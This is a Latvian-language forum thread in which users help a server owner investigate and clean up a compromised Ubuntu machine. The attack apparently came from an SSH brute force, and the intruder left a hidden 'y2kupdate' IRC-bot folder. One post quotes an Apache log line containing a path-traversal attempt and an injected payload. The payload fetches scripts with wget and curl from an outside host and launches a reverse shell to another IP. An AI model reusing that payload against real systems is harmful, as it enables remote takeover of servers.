Liekas esmu uzlausts. Linux.

[bumbulis]

Njā, tāda sajūta ka gaisma tuneļa galā dziest. 😀 Visur kaut kāda nekonkrēta, izbārstīta informācija. Atradu logos vēl tādas pašas rindas, vienīgais 13. jūnijā tikai ar citām ip adresēm. Vēl kas – pārsvarā visi topiki internetā par šo tēmu ir ap 2005 gadu, taču serveris ir likts pirms ~2 mēnešiem, līdz ar to tādiem caurumiem kuri bija pirms 5 gadiem nu nevajadzētu būt, pat defaultajā konfigurācijā. Un par caurumu pašā weblapā ar neesmu drošs. Kādu laiciņu hobija līmenī ņēmos ar tiem html, css, php, sql un paskatoties uz lapas kodu, tik daudz pateikt, ka to nav veidojis kāds zaļknābis, piepelnoties šmigai lai ir ko kojās dzert, pateikt varu. Taču lai šādu GET injekciju pārbaudītu man trūkst zināšanas (MÄ€JIENS: moš ir kāds vienkāršs veids!??), jo pēc logiem skatoties es nesaprotu, kā ticis izsaukts tas

[drono]

Tagad skatos, ka manējam serverim arī logos tieši tas pats, kas tev, un tai pašā datumā

Quote:

94.199.181.165 – – [22/Jun/2010:21:21:08 +0300] “GET /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1” 404 207 “-” “https://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget https://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O https://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O https://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80′);?> ;https://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget https://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O https://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O https://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80′);?> ;https://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget https://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O https://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O https://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80′);?>;Ustupid MF is Back; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)”

Nez kāpēc mani tas pavisam galīgi neuztrauc 😀

Man tiešām grūti iedomāties, cik šķībai tādā gadījumā ir jābūt servera konfigurācijai, lai šitas varētu reāli nostrādāt 😀

Apache un PHP jau pat defaultā konfigurācija, neko šitādu domājams, nepieļauj.

[bumbulis]

Nu jā, tātad ir jābūt citam caurumam, kas itkā ir labi, ka nav mājaslapā vai apachē, bet no otras puses izveidojās pilnīgs tupiks, ja atmet ssh bruteforce un šo te no apaches logiem. Tātad rīt jāturpina studēt tālāk info par to y2kupdate. Gaidat info no manis. 🙂

Paldies par info, drono! 🙂

[I’m not a racist, but…]

autor, lieto fedoru 13 un nebūs problēmas. Lai arī ubuntu skaitās populārākā distra, tā tomēr ir un paliks “just for fun”.

[bumbulis]

Man izvēlē lielu lomu spēlēja arī huge supports. Kā arī ubuntu popularitāte man neviļus liek domāt, ka ja viņa ir tik pupulāra, tad ir izstaigāta krustām šķērsām, līdz ar ko pēc loģikas vajadzētu būt daudz mazāk bugu, jo tāds lietotāju kvantums tos ātri atkož, pareizi? Es gan neesmu īpaši studējis, bet šad tad palasot forumus rodas iespaids, ka Ubuntu nolikšana ir kļuvusi drīzāk par modes lietu, nevis konkrētu faktu pamatotu argumentu, apmēram tāpat kā ar Microsoft vai Apple.

[bumbulis]

Sorry par dubultpostu pirmām kārtām!

Tiešām, izskatās, ka tas nebūs bijis caurums webā, bet gan veiksmīgs bruteforce. Paskatijos logos (p.s. – neviens jau nevarēja pateikt par tāda auth.log esamību, ne? 😀 ), atradu ka esmu periodiski bruteforcots, tikai grūti pateikt vai no viena cilvēka, jo ip adreses mainās. Š odien pat bruterforcošanās turpinājās, taču nobloķējot divas ip adreses, itkā viss beidzās ( un anyway, kopš vakardienas vai aizvakardienas ssh ir tikai man un tikai no natotās ip adreses ), taka tas tā. Esmu ticis logos līdz vietai, kur tika nomainītas paroles, tikai neesmu drošs vai čalis ir ticis, pie tām roota privilēģijām vai nav, kaut kādi su mājieni logos parādās, taču nemāku tos logus saprast, tapēc moš iesviedīšu to logu – Spiest šeit. Viņā ir daudz rindas, bet viņas analoģiski atkārtojās, taka procedūrai būtu jābūt skaidrai pēc pirmām 15 20 rindām. Liels paldies, ja kāds palīdzēs šo iztulkot cilvēkvalodā!

Tālāk par to y2kupdate failu, joprojām netieku viņam klāt. Komanda “find / -name y2kupdate” atgriež rezultātu “/home/jurists2/ /. /y2kupdate”, taču aiz /home/jurists2/ ir atstarpe, kā arī aiz /. ir atstarpe, līdz ar to es nemāku tikt līdz tam failam, lai viņu nahrenizētu. Any ideas?

Pieņemu ka epasti no kontiem, kuriem tika nomainītas paroles arī ir aizpludināti uz kādiem krievzemes serveriem.

[KristoZ]

Klau, a Tu kādu failu komanderu/menedžeri izmanto, vai “pa pliko” terminālī darbojies? Vai Tev ir arī grafiskā vide tam serverim?

Lai vai kā, silti ieteiktu mc jeb Midnight Commander:

Code:

sudo apt-get install mc

Terminālī atver ar komandu “mc”, tad atrodi savu home folderi (/home/jurists2/) un pirmā mape ar tukšo nosaukumu – vari paskatīties, kas tajā iekšā, vai uzreiz atzīmē to un nospied F8.

Teorētiski vajadzētu strādāt, jo es nupat arī izmēģināju uz savas sistēmas – Ubuntu ļauj izveidot mapes ar atstarpēm nosaukumos (” “) vai kā punktu (“.”), bet terminālī tādas izdzēst nav tik vienkārši (vismaz es neprotu).

[I’m not a racist, but…]

termināli atstarpi var izdzēst ‘ ‘ nevis ” “.

[bumbulis]

Lielais paldies, KristoZ! Ar pusnakts komandieri izdevās pārdēvēt mapes uz normāliem nosaukumiem.

P.S. Baigi labs raksts bija sanācis par tiem fočikiem. 😉

Ok, tad izdevās tikt klāt tai mapei. Atverot kuru atradu dažādus failus. Pašu y2kupdate failu neapdomīgi uzreiz izdzēsu. 🙁 Pārējos par laimi saglabāju. Ja kāds vēlas uzmest aci tiem – Spiest šeit. Cik varu noprast, tur ir konfigi irc zombēšanai un viss nepieciešamais crontabu ierakstu izveidei. Bija arī m.pid fails, kurā atradu procesa id. Taču mēģinot šo procesu nogalēt ar “kill procesaidnopidfaila” komandu, parādija, ka process tāds neesot. Mapi no servera aizvācu. ls -l komanda uzrādija, ka faili pieder lietotājam ne rootam. Izskatās, ka lauzējs tomēr pie root piejas nebūs ticis, pareizi? Kā viedajiem notepad lietotājiem liekas, varu uzelpot atviegloti, vai nē?? 🙂 Moš kāds būtu tik labs un uzmestu tiem skriptiem aci,es neko tādu par ko vēl vajadzētu satrautkies nemanīju, bet moš šis ieperinājies startupā vai moš vēl tur kas briesmīgāks!? Būtu ļoti pateicīgs.

[KristoZ]

Prieks par Tevi! ;]

Un paldies pašam! 🙂

Jā, izskatās, ka kāds skriptu bērniņš tur mazliet padzīvojies… Tu mēģināji novākt to procesu; bet tas Tev faktiski pie esošajiem procesiem parādās? Vari vēl pārskatīt pašlaik palaistos procesus, un aizdomīgākos iegūglēt, pārbaudīt, vai tiem tiešām tur jābūt, bet citādi, cerams, ka būs ou kei.

Un par to root’u – grūti teikt, tas atkarīgs no tā, kāds īsti bija intrūdera mērķis, bet es šaubos vai jamais tiešām būtu līdz tam ticis.

Drošības pēc vari jau vēl pārmeklēt visu cietni:

Code:

sudo find / -iname ‘y2k*’

,

bet tas varētu aizņemt diezgan daudz laika, atkarībā no sistēmā esošo failu daudzuma.

[Autors]

Ieraksti